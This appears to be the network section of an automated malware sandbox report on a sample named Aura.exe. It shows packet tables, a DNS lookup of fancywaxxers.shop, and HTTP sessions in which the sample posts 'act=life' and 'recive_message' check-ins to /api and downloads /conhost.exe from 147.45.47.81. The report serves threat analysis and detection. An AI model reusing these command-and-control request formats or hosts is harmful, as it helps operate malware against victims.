Jan 5, 2025 19:36:59.560234070 CET	49741	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:36:59.560262918 CET	443	49741	104.21.80.1	192.168.2.4
Jan 5, 2025 19:37:00.351130009 CET	443	49741	104.21.80.1	192.168.2.4
Jan 5, 2025 19:37:00.351216078 CET	443	49741	104.21.80.1	192.168.2.4
Jan 5, 2025 19:37:00.351286888 CET	49741	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:37:00.360001087 CET	49741	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:37:00.360019922 CET	443	49741	104.21.80.1	192.168.2.4
Jan 5, 2025 19:37:00.483911991 CET	49744	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:37:00.483939886 CET	443	49744	104.21.80.1	192.168.2.4
Jan 5, 2025 19:37:00.484004974 CET	49744	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:37:00.485096931 CET	49744	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:37:00.485110998 CET	443	49744	104.21.80.1	192.168.2.4
Jan 5, 2025 19:37:00.940112114 CET	443	49744	104.21.80.1	192.168.2.4
Jan 5, 2025 19:37:00.940182924 CET	49744	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:37:00.941539049 CET	49744	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:37:00.941550016 CET	443	49744	104.21.80.1	192.168.2.4
Jan 5, 2025 19:37:00.941775084 CET	443	49744	104.21.80.1	192.168.2.4
Jan 5, 2025 19:37:00.950637102 CET	49744	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:37:00.950776100 CET	49744	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:37:00.950802088 CET	443	49744	104.21.80.1	192.168.2.4
Jan 5, 2025 19:37:00.950870037 CET	49744	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:37:00.950877905 CET	443	49744	104.21.80.1	192.168.2.4
Jan 5, 2025 19:37:01.568984032 CET	443	49744	104.21.80.1	192.168.2.4
Jan 5, 2025 19:37:01.569066048 CET	443	49744	104.21.80.1	192.168.2.4
Jan 5, 2025 19:37:01.569137096 CET	49744	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:37:01.569358110 CET	49744	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:37:01.569374084 CET	443	49744	104.21.80.1	192.168.2.4
Jan 5, 2025 19:37:01.657552004 CET	49745	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:37:01.657582045 CET	443	49745	104.21.80.1	192.168.2.4
Jan 5, 2025 19:37:01.657646894 CET	49745	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:37:01.657897949 CET	49745	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:37:01.657912970 CET	443	49745	104.21.80.1	192.168.2.4
Jan 5, 2025 19:37:02.764856100 CET	443	49745	104.21.80.1	192.168.2.4
Jan 5, 2025 19:37:02.764925003 CET	49745	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:37:02.771708012 CET	49745	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:37:02.771716118 CET	443	49745	104.21.80.1	192.168.2.4
Jan 5, 2025 19:37:02.771939993 CET	443	49745	104.21.80.1	192.168.2.4
Jan 5, 2025 19:37:02.787198067 CET	49745	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:37:02.787492990 CET	49745	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:37:02.787498951 CET	443	49745	104.21.80.1	192.168.2.4
Jan 5, 2025 19:37:03.249066114 CET	443	49745	104.21.80.1	192.168.2.4
Jan 5, 2025 19:37:03.249174118 CET	443	49745	104.21.80.1	192.168.2.4
Jan 5, 2025 19:37:03.249263048 CET	49745	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:37:03.263158083 CET	49745	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:37:03.263170958 CET	443	49745	104.21.80.1	192.168.2.4
Jan 5, 2025 19:37:03.683208942 CET	49747	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:37:03.683231115 CET	443	49747	104.21.80.1	192.168.2.4
Jan 5, 2025 19:37:03.683330059 CET	49747	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:37:03.683598995 CET	49747	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:37:03.683612108 CET	443	49747	104.21.80.1	192.168.2.4
Jan 5, 2025 19:37:04.140213966 CET	443	49747	104.21.80.1	192.168.2.4
Jan 5, 2025 19:37:04.140290976 CET	49747	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:37:04.141432047 CET	49747	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:37:04.141443014 CET	443	49747	104.21.80.1	192.168.2.4
Jan 5, 2025 19:37:04.141665936 CET	443	49747	104.21.80.1	192.168.2.4
Jan 5, 2025 19:37:04.142867088 CET	49747	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:37:04.143672943 CET	49747	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:37:04.143706083 CET	443	49747	104.21.80.1	192.168.2.4
Jan 5, 2025 19:37:04.143834114 CET	49747	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:37:04.143876076 CET	443	49747	104.21.80.1	192.168.2.4
Jan 5, 2025 19:37:04.143981934 CET	49747	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:37:04.144002914 CET	443	49747	104.21.80.1	192.168.2.4
Jan 5, 2025 19:37:04.144124985 CET	49747	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:37:04.144146919 CET	443	49747	104.21.80.1	192.168.2.4
Jan 5, 2025 19:37:04.144292116 CET	49747	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:37:04.144318104 CET	443	49747	104.21.80.1	192.168.2.4
Jan 5, 2025 19:37:04.144470930 CET	49747	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:37:04.144503117 CET	443	49747	104.21.80.1	192.168.2.4
Jan 5, 2025 19:37:04.144510984 CET	49747	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:37:04.144664049 CET	49747	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:37:04.144697905 CET	49747	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:37:04.153927088 CET	443	49747	104.21.80.1	192.168.2.4
Jan 5, 2025 19:37:04.154108047 CET	49747	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:37:04.154134989 CET	443	49747	104.21.80.1	192.168.2.4
Jan 5, 2025 19:37:04.154155970 CET	49747	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:37:04.154170990 CET	49747	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:37:04.154300928 CET	49747	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:37:04.154331923 CET	49747	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:37:04.158847094 CET	443	49747	104.21.80.1	192.168.2.4
Jan 5, 2025 19:37:04.159003973 CET	49747	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:37:04.159034014 CET	443	49747	104.21.80.1	192.168.2.4
Jan 5, 2025 19:37:04.159053087 CET	49747	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:37:04.159653902 CET	443	49747	104.21.80.1	192.168.2.4
Jan 5, 2025 19:37:06.359931946 CET	443	49747	104.21.80.1	192.168.2.4
Jan 5, 2025 19:37:06.360014915 CET	443	49747	104.21.80.1	192.168.2.4
Jan 5, 2025 19:37:06.360167980 CET	49747	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:37:06.360239983 CET	49747	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:37:06.360255957 CET	443	49747	104.21.80.1	192.168.2.4
Jan 5, 2025 19:37:06.364172935 CET	49750	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:37:06.364207029 CET	443	49750	104.21.80.1	192.168.2.4
Jan 5, 2025 19:37:06.364285946 CET	49750	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:37:06.364557028 CET	49750	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:37:06.364569902 CET	443	49750	104.21.80.1	192.168.2.4
Jan 5, 2025 19:37:06.819060087 CET	443	49750	104.21.80.1	192.168.2.4
Jan 5, 2025 19:37:06.819127083 CET	49750	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:37:06.820539951 CET	49750	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:37:06.820548058 CET	443	49750	104.21.80.1	192.168.2.4
Jan 5, 2025 19:37:06.820751905 CET	443	49750	104.21.80.1	192.168.2.4
Jan 5, 2025 19:37:06.821924925 CET	49750	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:37:06.821974039 CET	49750	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:37:06.821986914 CET	443	49750	104.21.80.1	192.168.2.4
Jan 5, 2025 19:37:07.330985069 CET	443	49750	104.21.80.1	192.168.2.4
Jan 5, 2025 19:37:07.331023932 CET	443	49750	104.21.80.1	192.168.2.4
Jan 5, 2025 19:37:07.331053019 CET	443	49750	104.21.80.1	192.168.2.4
Jan 5, 2025 19:37:07.331074953 CET	49750	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:37:07.331084967 CET	443	49750	104.21.80.1	192.168.2.4
Jan 5, 2025 19:37:07.331098080 CET	443	49750	104.21.80.1	192.168.2.4
Jan 5, 2025 19:37:07.331131935 CET	49750	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:37:07.331145048 CET	443	49750	104.21.80.1	192.168.2.4
Jan 5, 2025 19:37:07.331182003 CET	443	49750	104.21.80.1	192.168.2.4
Jan 5, 2025 19:37:07.331190109 CET	49750	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:37:07.331197023 CET	443	49750	104.21.80.1	192.168.2.4
Jan 5, 2025 19:37:07.331247091 CET	49750	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:37:07.331254005 CET	443	49750	104.21.80.1	192.168.2.4
Jan 5, 2025 19:37:07.331516981 CET	443	49750	104.21.80.1	192.168.2.4
Jan 5, 2025 19:37:07.331562042 CET	49750	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:37:07.331568956 CET	443	49750	104.21.80.1	192.168.2.4
Jan 5, 2025 19:37:07.331958055 CET	443	49750	104.21.80.1	192.168.2.4
Jan 5, 2025 19:37:07.332005024 CET	49750	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:37:07.332010984 CET	443	49750	104.21.80.1	192.168.2.4
Jan 5, 2025 19:37:07.332020044 CET	443	49750	104.21.80.1	192.168.2.4
Jan 5, 2025 19:37:07.332062006 CET	49750	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:37:07.332139969 CET	49750	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:37:07.332149982 CET	443	49750	104.21.80.1	192.168.2.4
Jan 5, 2025 19:37:07.332159042 CET	49750	443	192.168.2.4	104.21.80.1
Jan 5, 2025 19:37:07.332164049 CET	443	49750	104.21.80.1	192.168.2.4
Jan 5, 2025 19:37:07.334629059 CET	49752	80	192.168.2.4	147.45.47.81
Jan 5, 2025 19:37:07.339406013 CET	80	49752	147.45.47.81	192.168.2.4
Jan 5, 2025 19:37:07.339482069 CET	49752	80	192.168.2.4	147.45.47.81
Jan 5, 2025 19:37:07.339572906 CET	49752	80	192.168.2.4	147.45.47.81
Jan 5, 2025 19:37:07.344351053 CET	80	49752	147.45.47.81	192.168.2.4
Jan 5, 2025 19:37:11.231695890 CET	49752	80	192.168.2.4	147.45.47.81
Jan 5, 2025 19:37:38.520673990 CET	63032	53	192.168.2.4	162.159.36.2
Jan 5, 2025 19:37:38.525527000 CET	53	63032	162.159.36.2	192.168.2.4
Jan 5, 2025 19:37:38.525603056 CET	63032	53	192.168.2.4	162.159.36.2
Jan 5, 2025 19:37:38.530416965 CET	53	63032	162.159.36.2	192.168.2.4
Jan 5, 2025 19:37:39.003901958 CET	63032	53	192.168.2.4	162.159.36.2
Jan 5, 2025 19:37:39.008913994 CET	53	63032	162.159.36.2	192.168.2.4
Jan 5, 2025 19:37:39.009011984 CET	63032	53	192.168.2.4	162.159.36.2

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 5, 2025 19:36:55.301826954 CET	55758	53	192.168.2.4	1.1.1.1
Jan 5, 2025 19:36:55.314891100 CET	53	55758	1.1.1.1	192.168.2.4
Jan 5, 2025 19:37:38.520108938 CET	53	61352	162.159.36.2	192.168.2.4
Jan 5, 2025 19:37:39.021164894 CET	53	50176	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 5, 2025 19:36:55.301826954 CET	192.168.2.4	1.1.1.1	0xd631	Standard query (0)	fancywaxxers.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jan 5, 2025 19:36:55.314891100 CET	1.1.1.1	192.168.2.4	0xd631	No error (0)	fancywaxxers.shop	104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 5, 2025 19:36:55.314891100 CET	1.1.1.1	192.168.2.4	0xd631	No error (0)	fancywaxxers.shop	104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 5, 2025 19:36:55.314891100 CET	1.1.1.1	192.168.2.4	0xd631	No error (0)	fancywaxxers.shop	104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 5, 2025 19:36:55.314891100 CET	1.1.1.1	192.168.2.4	0xd631	No error (0)	fancywaxxers.shop	104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 5, 2025 19:36:55.314891100 CET	1.1.1.1	192.168.2.4	0xd631	No error (0)	fancywaxxers.shop	104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 5, 2025 19:36:55.314891100 CET	1.1.1.1	192.168.2.4	0xd631	No error (0)	fancywaxxers.shop	104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 5, 2025 19:36:55.314891100 CET	1.1.1.1	192.168.2.4	0xd631	No error (0)	fancywaxxers.shop	104.21.48.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

fancywaxxers.shop

147.45.47.81

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49752	147.45.47.81	80	7328	C:\Users\user\Desktop\Aura.exe

Timestamp	Bytes transferred	Direction	Data
Jan 5, 2025 19:37:07.339572906 CET	198	OUT	GET /conhost.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: 147.45.47.81

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49733	104.21.80.1	443	7328	C:\Users\user\Desktop\Aura.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 18:36:56 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: fancywaxxers.shop
2025-01-05 18:36:56 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2025-01-05 18:36:56 UTC	1133	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 18:36:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=sb8dcve22dep2au2ttacko8boj; expires=Thu, 01 May 2025 12:23:35 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bD3qVWQvmi8qLynTffJbc2GVwq%2BAtT4DDS5y%2BSmxFOKM0JDVq2%2BN4YhbkCPhOPqVTpX4Ei3c9ETvFBGkHCFWszu5Rk3oh47L8GPeii3N7Tsp6fP%2BPSQCXPfei1IrVnykGG%2BiLw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd593a2586842d2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1556&min_rtt=1546&rtt_var=601&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2843&recv_bytes=908&delivery_rate=1788120&cwnd=229&unsent_bytes=0&cid=1474f4cf5013f6c6&ts=943&x=0"
2025-01-05 18:36:56 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2025-01-05 18:36:56 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49735	104.21.80.1	443	7328	C:\Users\user\Desktop\Aura.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 18:36:57 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 52 Host: fancywaxxers.shop
2025-01-05 18:36:57 UTC	52	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 42 56 6e 55 71 6f 2d 2d 40 68 69 74 6f 6b 34 31 31 31 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=BVnUqo--@hitok4111&j=
2025-01-05 18:36:57 UTC	1131	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 18:36:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=02grqghp3td9par7qpk1t5e6na; expires=Thu, 01 May 2025 12:23:36 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EsWuO%2F8VYcuO8ObXuk33ktdXwj%2FrkX%2FXCpyZ7R890ZhjSRxcLqLiRWBzlpXLK%2BX9iRe2x8Ot6PkZcF5sbgsEmtuZDMSOqBEmsXGFDh6BjGsk0D2UE2EbWTMaUQtfWCC8CLXNTw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd593aacb2542d2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1551&min_rtt=1540&rtt_var=600&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2842&recv_bytes=953&delivery_rate=1790312&cwnd=229&unsent_bytes=0&cid=50572d232230d690&ts=587&x=0"
2025-01-05 18:36:57 UTC	238	IN	Data Raw: 32 35 30 33 0d 0a 78 2b 67 4b 50 2f 66 77 39 7a 51 65 49 41 6c 4e 50 38 50 63 5a 64 44 65 50 48 4c 76 66 6a 58 32 68 48 52 50 51 66 54 48 4d 72 79 38 79 6e 77 64 7a 63 54 62 46 6d 31 46 4b 33 64 4c 73 61 6b 41 2f 50 78 64 46 73 31 45 55 35 66 6f 42 79 70 74 31 72 46 66 6e 76 32 4f 61 31 4f 45 6c 64 73 57 65 31 67 72 64 32 53 34 2f 67 43 2b 2f 41 5a 51 69 68 52 58 6c 2b 67 57 4c 69 71 62 74 31 37 66 72 34 52 74 56 35 4b 54 6b 31 56 79 54 57 77 6f 57 71 4b 32 43 37 6d 7a 56 42 2f 4e 55 68 65 54 2f 6c 5a 31 59 37 6d 69 52 74 32 4b 69 58 6c 55 31 59 33 62 54 7a 78 46 5a 32 38 46 34 62 30 41 73 72 4a 61 46 6f 51 57 58 5a 37 67 46 79 73 72 68 4b 35 55 31 4b 2b 4b 62 6c 61 59 6d 6f 64 59 65 45 70 6e 4c 6c 43 69 Data Ascii: 2503x+gKP/fw9zQeIAlNP8PcZdDePHLvfjX2hHRPQfTHMry8ynwdzcTbFm1FK3dLsakA/PxdFs1EU5foBypt1rFfnv2Oa1OEldsWe1grd2S4/gC+/AZQihRXl+gWLiqbt17fr4RtV5KTk1VyTWwoWqK2C7mzVB/NUheT/lZ1Y7miRt2KiXlU1Y3bTzxFZ28F4b0AsrJaFoQWXZ7gFysrhK5U1K+KblaYmodYeEpnLlCi
2025-01-05 18:36:57 UTC	1369	IN	Data Raw: 2f 6b 6e 79 75 30 5a 51 31 56 77 45 70 75 55 48 50 44 61 62 74 56 61 65 75 73 52 78 48 5a 4b 65 31 51 34 38 53 6d 63 68 57 4b 4b 78 41 4c 4f 38 54 42 2b 4e 48 31 2b 63 34 68 77 69 4c 4a 6d 72 57 74 6d 74 67 32 39 53 6b 70 71 54 57 58 38 43 4a 57 39 61 75 66 35 66 38 70 78 4f 45 34 34 49 57 6f 57 6d 43 57 4d 36 31 71 4a 63 6e 76 33 4b 62 6c 4f 55 6e 35 56 45 64 45 6c 67 4b 6b 2b 71 74 77 71 2f 76 46 4d 61 67 68 39 58 6b 2b 77 63 49 69 6d 53 71 46 33 59 70 59 6f 6f 45 39 57 56 6a 52 59 6b 41 6b 67 71 54 61 61 79 45 66 43 47 48 67 2f 44 42 52 65 54 36 6c 5a 31 59 35 36 67 55 39 32 75 68 57 74 56 6e 6f 43 56 52 48 70 50 62 6a 31 62 70 4c 41 4e 73 61 35 55 48 6f 73 66 58 70 2f 76 45 79 6f 6e 31 75 73 51 32 62 33 4b 4d 42 32 30 6e 35 35 61 64 6c 56 72 62 30 4c Data Ascii: /knyu0ZQ1VwEpuUHPDabtVaeusRxHZKe1Q48SmchWKKxALO8TB+NH1+c4hwiLJmrWtmtg29SkpqTWX8CJW9auf5f8pxOE44IWoWmCWM61qJcnv3KblOUn5VEdElgKk+qtwq/vFMagh9Xk+wcIimSqF3YpYooE9WVjRYkAkgqTaayEfCGHg/DBReT6lZ1Y56gU92uhWtVnoCVRHpPbj1bpLANsa5UHosfXp/vEyon1usQ2b3KMB20n55adlVrb0L
2025-01-05 18:36:57 UTC	1369	IN	Data Raw: 71 35 53 47 6f 73 54 57 70 69 6d 57 47 30 6b 6a 75 55 49 6e 6f 2b 4a 66 46 36 66 30 4b 42 56 63 6b 78 73 4f 52 32 2b 38 42 37 79 75 31 4a 51 31 56 78 61 6c 65 34 51 50 79 79 62 70 6c 37 51 71 6f 39 6e 56 5a 57 53 6d 46 4e 34 53 57 41 73 55 4b 57 73 44 62 4b 30 57 78 47 48 46 68 66 61 70 68 45 31 59 38 37 6c 59 63 6d 75 79 46 31 65 6d 35 79 53 51 44 78 64 4a 54 59 64 70 72 4a 48 36 76 78 54 47 49 67 5a 57 4a 58 73 47 43 67 70 6d 71 31 65 33 62 65 46 62 46 32 5a 6d 70 39 62 63 6b 5a 6a 4a 6c 61 71 75 41 65 7a 74 68 35 65 7a 52 74 50 31 4c 35 57 47 53 53 61 71 46 2b 63 6b 49 6c 6d 55 35 4b 45 31 55 6b 79 57 79 73 6f 55 65 48 6d 52 37 36 31 58 68 75 48 47 46 65 54 36 78 4d 75 4a 4a 57 6f 56 39 53 72 6a 57 78 52 6e 4a 2b 54 56 6e 74 47 62 6a 31 59 71 4c 49 4c Data Ascii: q5SGosTWpimWG0kjuUIno+JfF6f0KBVckxsOR2+8B7yu1JQ1Vxale4QPyybpl7Qqo9nVZWSmFN4SWAsUKWsDbK0WxGHFhfaphE1Y87lYcmuyF1em5ySQDxdJTYdprJH6vxTGIgZWJXsGCgpmq1e3beFbF2Zmp9bckZjJlaquAezth5ezRtP1L5WGSSaqF+ckIlmU5KE1UkyWysoUeHmR761XhuHGFeT6xMuJJWoV9SrjWxRnJ+TVntGbj1YqLIL
2025-01-05 18:36:57 UTC	1369	IN	Data Raw: 62 4e 41 78 6d 4e 70 68 45 68 59 38 37 6c 57 64 65 33 68 47 5a 55 6d 4a 53 64 55 58 4a 50 59 43 6c 57 70 72 6b 42 76 37 52 54 46 59 34 64 55 35 37 30 46 53 59 70 6d 36 38 51 6b 4f 57 4e 63 42 33 4e 30 72 4a 61 56 56 4a 77 50 55 76 68 6f 55 6d 72 2f 46 6b 63 7a 55 51 58 6c 2b 6b 66 49 69 75 65 71 6c 2f 61 71 34 78 75 55 4a 43 64 6e 30 52 30 54 47 59 6b 55 71 71 73 42 37 2b 34 55 68 53 46 46 31 33 55 71 46 59 71 4f 39 62 39 45 4f 75 6f 68 57 68 65 67 39 4b 4b 47 47 55 43 62 43 4d 64 2b 66 34 4c 76 4c 78 52 48 49 45 58 58 35 58 71 47 43 6f 6d 6e 36 31 59 7a 4b 53 4f 59 46 79 62 6e 5a 52 53 65 55 64 76 4b 46 6d 6e 73 55 66 38 2f 46 6b 49 7a 55 51 58 75 38 45 6a 62 77 4b 73 35 55 2b 51 76 4d 70 76 55 64 58 4b 31 56 70 2f 54 6d 4d 67 57 36 69 79 44 62 75 33 55 Data Ascii: bNAxmNphEhY87lWde3hGZUmJSdUXJPYClWprkBv7RTFY4dU570FSYpm68QkOWNcB3N0rJaVVJwPUvhoUmr/FkczUQXl+kfIiueql/aq4xuUJCdn0R0TGYkUqqsB7+4UhSFF13UqFYqO9b9EOuohWheg9KKGGUCbCMd+f4LvLxRHIEXX5XqGComn61YzKSOYFybnZRSeUdvKFmnsUf8/FkIzUQXu8EjbwKs5U+QvMpvUdXK1Vp/TmMgW6iyDbu3U
2025-01-05 18:36:57 UTC	1369	IN	Data Raw: 55 6b 4f 4d 5a 4c 43 4b 51 74 31 66 58 74 34 52 6c 55 70 32 61 6e 46 64 34 52 32 59 70 55 61 75 2f 41 4c 79 79 56 6c 44 44 58 46 43 4d 70 6b 35 74 41 6f 61 2b 51 73 69 6f 71 32 56 53 31 59 33 62 54 7a 78 46 5a 32 38 46 34 62 63 56 74 72 46 4d 47 59 6f 53 57 4a 66 30 46 79 41 6f 68 4b 4a 66 32 71 4b 47 62 6c 4b 54 6b 35 42 63 63 45 56 75 4a 46 4b 74 2f 6b 6e 79 75 30 5a 51 31 56 78 35 6e 2f 55 42 4c 69 32 64 73 30 75 65 75 73 52 78 48 5a 4b 65 31 51 34 38 51 57 41 6b 57 61 47 79 42 37 61 78 58 67 4b 43 47 31 43 64 37 51 51 6e 4a 4a 47 75 57 4e 57 71 6a 48 70 52 6d 34 43 51 52 47 34 43 4a 57 39 61 75 66 35 66 38 6f 70 5a 41 4a 30 66 46 61 58 77 46 54 73 6f 6d 36 6b 51 77 65 75 54 4b 46 71 5a 30 73 30 57 65 6b 31 69 4c 46 4b 67 74 77 75 2f 75 56 63 56 6a 42 Data Ascii: UkOMZLCKQt1fXt4RlUp2anFd4R2YpUau/ALyyVlDDXFCMpk5tAoa+Qsioq2VS1Y3bTzxFZ28F4bcVtrFMGYoSWJf0FyAohKJf2qKGblKTk5BccEVuJFKt/knyu0ZQ1Vx5n/UBLi2ds0ueusRxHZKe1Q48QWAkWaGyB7axXgKCG1Cd7QQnJJGuWNWqjHpRm4CQRG4CJW9auf5f8opZAJ0fFaXwFTsom6kQweuTKFqZ0s0Wek1iLFKgtwu/uVcVjB
2025-01-05 18:36:57 UTC	1369	IN	Data Raw: 4a 43 34 34 31 72 6f 65 78 2b 57 4e 5a 42 33 4e 30 70 5a 52 66 30 4e 68 4a 6c 47 75 75 51 4f 67 74 6c 6b 43 6a 42 31 63 6d 65 6f 57 49 43 36 63 70 46 6e 54 71 59 64 76 57 70 71 58 31 52 67 38 52 58 4e 76 42 65 47 66 43 72 6d 77 42 55 72 4e 41 78 6d 4e 70 68 45 68 59 38 37 6c 55 4e 53 67 67 47 56 65 6d 70 47 48 56 33 70 51 61 79 4a 58 73 37 51 4d 74 37 46 54 48 59 34 61 55 5a 2f 71 42 43 51 6a 6c 61 34 51 6b 4f 57 4e 63 42 33 4e 30 72 5a 42 61 6b 68 73 49 30 75 71 76 77 53 6b 73 55 35 51 77 31 78 47 6b 2f 64 57 64 54 57 47 73 6c 66 42 36 35 4d 6f 57 70 6e 53 7a 52 5a 36 53 32 30 6f 57 36 2b 73 41 72 53 7a 55 52 6d 45 47 46 2b 58 35 68 49 70 4a 4a 4f 6d 58 4e 57 69 69 57 64 5a 6e 4a 79 63 57 54 77 4d 4b 79 68 46 34 65 5a 48 6b 36 64 64 48 49 42 63 53 4e 72 Data Ascii: JC441roex+WNZB3N0pZRf0NhJlGuuQOgtlkCjB1cmeoWIC6cpFnTqYdvWpqX1Rg8RXNvBeGfCrmwBUrNAxmNphEhY87lUNSggGVempGHV3pQayJXs7QMt7FTHY4aUZ/qBCQjla4QkOWNcB3N0rZBakhsI0uqvwSksU5Qw1xGk/dWdTWGslfB65MoWpnSzRZ6S20oW6+sArSzURmEGF+X5hIpJJOmXNWiiWdZnJycWTwMKyhF4eZHk6ddHIBcSNr
